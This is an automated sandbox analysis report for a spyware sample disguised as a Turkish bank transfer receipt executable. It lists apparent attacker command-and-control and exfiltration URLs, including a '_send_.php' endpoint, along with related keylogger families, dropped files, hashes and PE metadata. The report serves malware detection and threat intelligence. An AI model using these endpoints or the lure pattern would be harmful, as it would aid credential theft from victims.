http://anotherarmy.dns.army:8081	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1384724354.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E1F000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.96.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586930
Start date and time:	2025-01-09 19:10:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe renamed because original name is a hash value
Original Sample Name:	dekont garanti bbva_Baka Bankaya Transfer 01112 img .exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/6@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 229 Number of non-executed functions: 19
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 23.56.254.164, 4.245.163.56
Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, PID 7540 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Simulations

Behavior and APIs

Time	Type	Description
13:11:10	API Interceptor	6808858x Sleep call for process: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe modified
13:11:12	API Interceptor	11x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse
	gem1.exe	Get hash	malicious	Unknown	Browse
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	PO.exe	Get hash	malicious	MassLogger RAT	Browse
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.96.1	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
193.122.130.0	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.64.1
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
checkip.dyndns.com	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
s-part-0017.t-0009.fb-t-msedge.net	Nuevo-orden.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.253.45
	Notification of a Compromised Email Account.msg	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	Setup64v9.9.8.msi	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw==	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	Play_VM-NowAccountingAudiowav011.html	Get hash	malicious	Unknown	Browse	13.107.253.45
	17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe	Get hash	malicious	XWorm	Browse	13.107.253.45
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	13.107.253.45
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	13.107.253.45
api.telegram.org	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	gem1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	gem1.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DyM4yXX.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	5dFLJyS86S.ps1	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	0V2JsCrGUB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	1.3.115.13
	https://sora-ai-download.com/	Get hash	malicious	Unknown	Browse	104.22.20.144
ORACLE-BMC-31898US	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	miori.x86.elf	Get hash	malicious	Unknown	Browse	140.204.251.205
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.96.1
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
3b5074b1b5d032e5620f69f9f700ff0e	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO-12202432_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ-12202430_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO-12202432_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://cipassoitalia.it	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.log

Download File

Process:	C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.337066511654157
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
MD5:	55A2AF8F9FCA3AE99FBA235D3E16A53F
SHA1:	32F34219599006657BFF0B868257916A0C393AAA
SHA-256:	2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
SHA-512:	F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.356731422178564
Encrypted:	false
SSDEEP:	24:3CytZWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:yyjWSU4xympjms4RIoU99tK8NDv
MD5:	68CB8F49FDE7FC3DF6CEE19CB730C7F8
SHA1:	1EC425657E358C85CA4A3A04E6525E29B59FCB16
SHA-256:	5DA91A846188B8604BEE0056451D6185AA1B91646196C90699ADFF530F8BC555
SHA-512:	D3FB70289E5CD0287009394E3C9485467999DB61F9AB74D16C9E6D0CF7D0A2411BF0F165EF24D5E7BB71FCAF78A84F5499600074ED2A3FE4F8AE47CF09654415
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x43t2cl.nbs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsk4qyqp.soh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_futqoqw2.dyy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0mf4ill.b2t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7685608810335545
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
File size:	740'352 bytes
MD5:	88398f906322ec15187390184b930a71
SHA1:	ad89392d4d6978bdcc006619848e6e66af945326
SHA256:	97b8275d582b042ef248a2983905bb23280d609ba51393b7abd58fb7d94e9fd0
SHA512:	2fe7d3909297df4d90549a56b33949418e095c25808c70f8399f476146ba0ce9789499632264b995a0c86d06973934acf7e27fcae8ca3149129fb53400621fbd
SSDEEP:	12288:5c55OHTDPdDzp5Itu0m/ABN+ckfOV7hE1S6wD+vxhnhXdymEFWngluiRHr6QSXOP:5cXOPtzp54C/ABQTfINZcLXdNEFjNrLX
TLSH:	9EF402A45529DF07D416A7B00A31F2B427B92EDEAC02E31A9FDA7DEFB565F111C00683
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....k...............0..@..........._... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4b5f86
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBF6B1A99 [Wed Oct 7 18:16:57 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add dword ptr [eax], eax
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add dword ptr [eax], eax
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
